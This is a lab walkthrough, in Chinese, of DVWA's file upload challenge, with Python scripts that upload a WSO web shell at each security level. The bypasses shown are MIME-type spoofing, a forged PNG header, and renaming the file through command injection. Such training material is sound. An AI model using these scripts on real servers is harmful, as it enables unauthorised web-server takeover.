low
這個等級直接上傳shell
import requests
import re
def main():
headers = {
'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=low'
}
url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
data = {
'Upload': 'Upload'
}
files = [('uploaded', ('wso.php', open('wso.php', 'rb'), 'application/octet-stream'))]
res = requests.post(url, data=data, files=files, headers=headers)
m = re.search(r'<pre>(.*?)</pre>', res.content, re.M | re.S)
if m:
print(m.group(1))
if __name__ == '__main__':
main()
返回結果如下:
../../hackable/uploads/wso.php succesfully uploaded!
[Finished in 0.2s]
medium
查看源碼,可發現代碼限制了MIME類型和文件大小
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) )
繞過思路,改一下MIME類型即可。
import requests
import re
def main():
headers = {
'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=medium'
}
url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
data = {
'Upload': 'Upload'
}
files = [('uploaded', ('wso.php', open('wso.php', 'rb'), 'image/jpeg'))]
res = requests.post(url, data=data, files=files, headers=headers)
m = re.search(r'<pre>(.*?)</pre>', res.content, re.M | re.S)
if m:
print(m.group(1))
if __name__ == '__main__':
main()
high
查看源碼,可發現代碼限制了後綴名,文件大小和用getimagesize檢查文件頭並判斷文件大小
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && ( $uploaded_size < 100000 ) && getimagesize( $uploaded_tmp ) )
繞過思路:shell的後綴名改爲jpg/jpeg/png,文件頭插入jpg/png/gif的頭部信息繞過getimagesize,這裏我用png的頭部信息(前8個字節):
89 50 4E 47 0D 0A 1A 0A
注:用二/十六進制編輯器操作
import requests
import re
def main():
headers = {
'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=high'
}
url = 'http://192.168.67.22/dvwa/vulnerabilities/upload/'
data = {
'Upload': 'Upload'
}
files = [('uploaded', ('wso.png', open('dog.php', 'rb'), 'application/octet-stream'))]
res = requests.post(url, data=data, files=files, headers=headers)
m = re.search(r'<pre>(.*?)</pre>', res.content, re.M | re.S)
if m:
print(m.group(1))
if __name__ == '__main__':
main()
文件上傳後,通過前面的command injection漏洞,使用mv命令將其後綴改爲php。【這是一個梗,感覺上有不需要command injection的方法,希望路過的朋友指教一下】